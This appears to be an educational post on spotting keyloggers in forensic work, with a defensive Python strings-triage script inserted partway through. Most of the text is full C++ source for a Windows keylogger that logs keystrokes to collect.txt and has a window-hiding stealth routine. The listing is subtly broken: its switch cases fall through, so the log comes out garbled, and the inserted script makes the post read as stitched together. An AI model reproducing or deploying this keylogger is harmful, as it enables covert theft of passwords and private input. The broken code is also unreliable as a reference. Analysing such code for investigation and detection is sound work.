Now, this example is for educational purposes only and you should not
run this code on your own machine if you are not familiar with all of
the lines in this code.
Keyloggers have been viewed as something only people with bad intentions
write, but a keylogger is nothing more than a program that monitors the
keys pressed on the keyboard and saves them in a file for later review.
In an investigation, you might have to look at code and identify basic
patterns in order to "guess" what the code is designed to do. In this
example, you can see the basic features of a keylogger, and I hope it will
teach you that simple code like this can be added to any program to
accomplish the same thing. Thus, downloaded so-called pirated, illegal, or
cracked versions of applications can contain this type of added code.
For the user, the functionality of the application will not visibly
change, but the application might have "added features" that users are
not aware of.
In many cases, executable analysis is just a simple strings search that
reveals keywords compiled inside the executable; these can be googled
and help you understand some of the features of the program. We can see
the message and the clear-text name of the file that is used to collect
the captured keystrokes. If the code connected to a server on the
Internet, we might even see the URL or the IP address of the server the
data is exfiltrated to.
So, in this case a simple keyword search on the executable reveals a
portion of my code, and thus its intended purpose. Code can therefore be
analyzed by non-programmers, who can still reach a successful heuristic
conclusion about what the code, or a portion of it, is designed to do.
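The strings search described above, as an added example that is not part of the original post: a Python script that pulls printable ASCII and UTF-16LE runs out of a binary and groups them by what they suggest about the program. The indicator categories, the `extract_strings` and `triage` names, and the embedded sample bytes are assumptions constructed for illustration; the sample reuses the message and file name from the program listed on this page, with one string stored as UTF-16LE to exercise the wide-string path.

```python
import re

MIN_LEN = 5  # shortest run reported, same idea as `strings -n 5`

# Indicator patterns; the Win32 names include the calls used by the code on this page.
INDICATORS = {
    "keyboard_api": re.compile(r"GetAsyncKeyState|GetKeyState|SetWindowsHookEx"),
    "window_hiding": re.compile(r"ConsoleWindowClass|FindWindowA|ShowWindow|AllocConsole"),
    "key_label": re.compile(r"\[(BACKSPACE|TAB|SHIFT|CONTROL|ESCAPE)\]"),
    "output_file": re.compile(r"\b[\w-]+\.(txt|log|dat)\b", re.I),
    "url": re.compile(r"https?://[^\s\"']+", re.I),
    "ipv4": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "keyword": re.compile(r"keylog", re.I),
}

def extract_strings(data: bytes, min_len: int = MIN_LEN):
    """Return printable ASCII and UTF-16LE runs found in a binary blob."""
    ascii_runs = re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)
    wide_runs = re.findall(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, data)
    found = [r.decode("ascii") for r in ascii_runs]
    found += [r.decode("utf-16le") for r in wide_runs]
    return found

def triage(data: bytes):
    """Map each indicator category to the sorted strings that matched it."""
    hits = {}
    for s in extract_strings(data):
        for name, pattern in INDICATORS.items():
            if pattern.search(s):
                hits.setdefault(name, set()).add(s)
    return {k: sorted(v) for k, v in hits.items()}

# Constructed sample: string-table fragments such a build would contain,
# separated by non-printable filler. Not a real executable.
SAMPLE = b"\x00\x01".join([
    b"MZ\x90\x00\x03",
    b"This is my example of a keylogger - Zoltan",
    b"collect.txt", b"[BACKSPACE]", b"[TAB]",
    b"GetAsyncKeyState", b"USER32.dll",
    "ConsoleWindowClass".encode("utf-16le"),
]) + b"\x00\x00"

if __name__ == "__main__":
    for category, strings in triage(SAMPLE).items():
        print(f"{category}: {strings}")
```

To triage a real file, pass its contents to `triage`, for example the bytes read from a suspect executable opened in binary mode.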
Warning: You will need to use Task Manager in order to stop this program from running.
#include <iostream>
#include <windows.h>
#include <winuser.h>
#include <fstream>
#include <string>

using namespace std;

int Save(int key_stroke, string file);
void Stealth();

int main(){
    //Stealth();
    char i;
    cout << "This is my example of a keylogger - Zoltan" << endl;
    while (1){
        for (i = 8; i <= 190; i++){
            if (GetAsyncKeyState(i) == -32767)
                Save(i, "collect.txt");
        }
    }
    return 0;
}

int Save(int key_stroke, string file){
    if ((key_stroke == 1) || (key_stroke == 2))
        return 0;
    ofstream outFile;
    char pressed;
    pressed = key_stroke;
    outFile.open(file, std::fstream::app);
    cout << VK_OEM_PERIOD << endl;
    outFile << "\n";
    switch (key_stroke){
    case 8:
        outFile << "[BACKSPACE]";
    case 13:
        outFile << " ";
    case VK_OEM_PERIOD: //same as 190
        outFile << ".";
    case VK_TAB:
        outFile << "[TAB]";
    case VK_SHIFT:
        outFile << "[SHIFT]";
    case VK_CONTROL:
        outFile << "[CONTROL]";
    case VK_ESCAPE:
        outFile << "[ESCAPE]";
    case VK_END:
        outFile << "[END]";
    case VK_LEFT:
        outFile << "[LEFT]";
    case VK_UP:
        outFile << "[UP]";
    case VK_RIGHT:
        outFile << "[RIGHT]";
    case VK_DOWN:
        outFile << "[DOWN]";
    case VK_HOME:
        outFile << "[HOME]";
    case 110:
        outFile << ".";
    default:
        outFile << pressed;
        outFile.close();
    }
    return 0;
}

void Stealth(){
    HWND stealth;
    AllocConsole();
    stealth = FindWindowA("ConsoleWindowClass", NULL);
    ShowWindow(stealth, 0);
}